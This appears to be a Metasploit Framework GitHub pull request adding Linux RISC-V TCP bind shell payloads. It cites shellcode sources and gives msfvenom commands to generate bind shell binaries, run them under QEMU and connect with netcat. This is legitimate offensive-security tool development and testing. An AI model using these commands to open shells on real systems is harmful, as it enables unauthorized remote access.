metasploit-framework icon indicating copy to clipboard operation
metasploit-framework copied to clipboard
verified publisher icon rapid7

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads

Open bcoles opened this issue 1 month ago • 0 comments

Add Linux RISC-V 32-bit/64-bit TCP bind shell payloads.

Source

  • https://modexp.wordpress.com/2022/05/02/shellcode-risc-v-linux/
  • https://web.archive.org/web/20230326161514/https://github.com/odzhan/shellcode/commit/d3ee25a6ebcdd21a21d0e6eccc979e45c24a9a1d
  • https://github.com/bcoles/shellcode/blob/main/riscv32/bindshell/bind.s

Verification

Tested with QEMU. For other test environments, see https://github.com/rapid7/metasploit-framework/pull/19518#issuecomment-2385330975.

Generate a Linux Command Shell, Bind TCP Inline payload (with optional NOP sled):

./msfvenom -n 100 -f elf -p linux/riscv64le/shell_bind_tcp LPORT=1337 > bind.elf

./msfvenom -n 100 -f elf -p linux/riscv32le/shell_bind_tcp LPORT=1337 > bind.elf

Execute the payload with QEMU:

$ /home/user/qemu/build/qemu-riscv64 -strace ./bind.elf

$ /home/user/qemu/build/qemu-riscv32 -strace ./bind.elf

Note the payload was executed successfully (lsof -i :1337) :)

Connect to the bindshell with netcat nc HOST 1337 (or use exploit/multi/handler).

bcoles avatar Nov 27 '25 09:11 bcoles